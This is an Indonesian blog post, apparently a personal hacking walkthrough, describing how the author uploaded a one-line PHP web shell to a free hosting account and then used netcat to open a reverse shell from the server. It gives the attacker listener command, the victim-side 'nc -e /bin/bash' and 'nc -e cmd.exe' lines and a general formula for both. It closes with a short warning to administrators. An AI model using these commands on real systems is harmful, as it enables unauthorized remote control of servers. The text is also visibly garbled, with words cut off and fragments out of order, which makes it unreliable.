== sh.php ===
<?
$sh = system($sh);
?>
Dan setelah itu s
Setelah itu saya langsung "mengunjungi" situs gratisan saya ,lalu saya uploa
daya mencoba menjalankannya dan berhasil
Karena kalau menjalankan shell dari script php tidak "leluasa" maka
k
TIDAK JALAN ....
Mengapa ? , karena di server tersebut user gratisan tid
Setelah itu saya upload script connect.pl dari bosen.net, dan menjalankannya
tapi ternyata
..hik..hik..h
iak diizinkan untuk mengakses PERL ....
Stress .....? , Iya
Namun ternyata keberuntungan berpihak pada saya .., seviour mengontak saya dari kantor
[Yahoo Messenger ]
seviour> Woii
1>Gimana ?
az001>Woii
seviour> Ngapain lu
az001>Lagi iseng nih,tapi sial ...
seviour>Sial kenapa ?
az001>Teknik remotebs gak bisa dipake, nggak ada PERLnya
seviour>Ooooo, itu mah gampang
az0
0 seviour>NETCAT !!!
az001>Sial, kok gw lupa yach
Ternyata saya melupakan sesuatu, iya .. NETCAT , tools paling ampuh di dunia saat ini
bisa dipakai untuk itu.
Tapi ada nggak ya ....
===========
#whereis nc
nc: /usr/local/bin/
ternyata ada ...
Langsung saya menjalankan netcat tersebut ...
======================================================================================
= Ini adalah langkahnya diurutkan dari langkah yang pertama :
[Attacker]
c:\> nc -v -n -l -p 42001
listening on [any] 42001 ...
[Victim]
nc -e /bin/bash 141.118.0.1 42001
[Attacker]
.0.1] from (UNKNOWN) [202
C:\>nc -v -n -l -p 42001
listening on [any] 42001 ...
connect to [141.118.0.1] from (UNKNOWN) [141.118.0.2] 1036
Setelah Attacker menerima pesan yang kurang lebih adalah
"connect to [141.11
8..100.10.20] 1036"
,maka setelah itu si attacker dapat menuliskan command linux.
Misal:
[Attacker]
C:\>nc -v -n -l -p 42001
listening on [any] 42001 ...
connect to [141.118.0.1] from (UNKNOWN) [141.118.0.2] 1036
k mess
ls /boot
System.map@ initrd-2.4.18-6mdk.img lilo-text/
System.map-2.4.18-6mdk initrd.img@ map
boot.0800 kernel.h@ mbr.b
boot.b@ kernel.h-2.4.18-6m
dage@
chain.b lilo@ os2_d.b
config@ lilo-bmp/ us-latin1.klt
config-2.4.18-6mdk lilo-graphic/ vmlinuz@
an] [IP Attacker] [port yg di gunakan attacker]
Note : Dengan as
grub/ lilo-menu/ vmlinuz-2.4.18-6mdk
Rumus Umum =>
Attacker :
nc -v -n -l -p [port yang digunakan]
Victim :
nc -e [Shell yang akan diguna
kumsi IP 141.118.0.1 adalah IP Public
Kalau target windows :
[Attacker]
Langkahnya Sama
[Victim]
nc -e cmd.exe [ip attacker] [port yang digunakan attacker]
et => Download videonya
Yang membuat saya bingung dan harus menjadi perhatian kita semua adalah ...
===================================================================================================EOF
Bingung memahami tulisan diatas :
Kunjungi www.corenets.
n
- KENAPA Option DGAPING_SECURITY_HOLE diaktifkan
- Jika 'terpaksa' menginstall netcat dan mengaktifkan Option itu, kenapa Si admin waktu mengompile
netcat menggunakan :
make install
atau :
"Mungkin adminnya sedang belajar menginstall ?" => ????????
Tulisan in
- Kenapa dia memberi izin kepada user (apache dalam hal ini) untuk mengakses netcat
Saya mungkin dapat menjawabnya dengan :
"Mungkin gw adalah seorang yang sangat beruntung di dunia ini "
i dibuat agar para "Admin" di luar sana berhati-hati dalam "menginstall" suatu aplikasi tertentu
yang dapat "membahayakan" .
Referensi :
- http://www.corenets.net
- Remote BackShell , Author: the_day
- # man netcat
- google.com
Auth: AZ001
This is a short description in the author block about the author. You edit it by entering text in the "Biographical Info" field in the user admin panel.
0 comments:
Post a Comment